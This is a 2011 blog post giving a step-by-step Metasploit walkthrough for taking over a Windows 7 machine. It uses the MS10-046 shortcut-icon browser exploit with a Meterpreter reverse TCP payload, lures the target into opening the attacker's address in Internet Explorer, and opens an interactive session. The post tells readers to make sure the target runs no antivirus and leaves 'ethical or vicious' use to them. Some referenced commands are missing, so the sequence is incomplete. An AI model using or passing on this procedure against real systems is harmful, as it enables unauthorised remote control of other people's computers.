METASPLOIT: Hacking windows 7 exploit December 17, 2011Posted by hasnain110 in Uncategorized.
Hey Guys. I will be giving a quick dirty how-to of exploiting a windows velunurbility to login to remove system with out username and password using Metasploit
1. MetaSploit Installed (Preferably BackTrac)
2. Ruby Installed (Install all the package of Ruby to avoid any issues)
3. Two OS running either on same as virtual or physically different
4. Target host must not be running any AV
Here are the quick Steps.
Machine 1: Host Linux Machine
Machine 2: Target Windows 7 Machine
Download and Install Metasploit Framework Source Code on the Machine 1. I prefer downloading from SVN. run the given below command on CLI
Download directly from here:http://downloads.metasploit.com/data/releases/framework-latest.tar.bz2
Locate the file msfconsole. In my case it was under /opt/framework-x.x.x/app
Run it as ruby msfconsole
Now once you get the msf> prompt type the below command
and look for the module exploit/windows/browser/ms10_046_shortcut_icon_dllloader
Now once we have found the desired module we will use this exploit by typing the below command
Once loaded your msf prompt should be inclusive of the loaded exploit. given below is the image
Now once the exploit is loaded we will set the payload for the above select exploit. In our scenario will be using reverse TCP payload. Type the below command to set payload
set payload windows/meterpreter/reverse_tcp
Now its time to do some configuration for the exploit/payload that we have just set. type the given command
You should get below default output.
Now we have to set the local host to listen. Type the given below two commands
set SRVHOST x.x.x.x ( This will be your HOST IP address running metasploit )
set LHOST x.x.x.x ( This will be also be your HOST IP address running metasploit)
Now check if the above applied configuration is applied
Now Finally we will start to exploit. Run the command Exploit
Once executed we should “Server Started” (Make sure that your server is not running any web service on port 80)
Seems like all is ok till now
On any Client machine simply open Internet Explorer and try to open http://x.x.x.x (IP of the MetaSploit server)
Note: it will give your a pop-up asking from permission click ALLOW.
**Make sure you do not have any AntiVirus running on the target PC
Once connection is established you should see something like below
You can check the number of successful connected session by running the command sessons in msf console
Now as we can see that we have one victim connected its time to login to the system. run the command session –i 1
Once connected type linux command to browse inside the System..Enjoy
This Documentation is purely for educational purpose. using it ethically or viciously its your individual act .
Use it responsibly. Comment if you like the post
Ending Note: Can not explain the details of each step due to lack of time: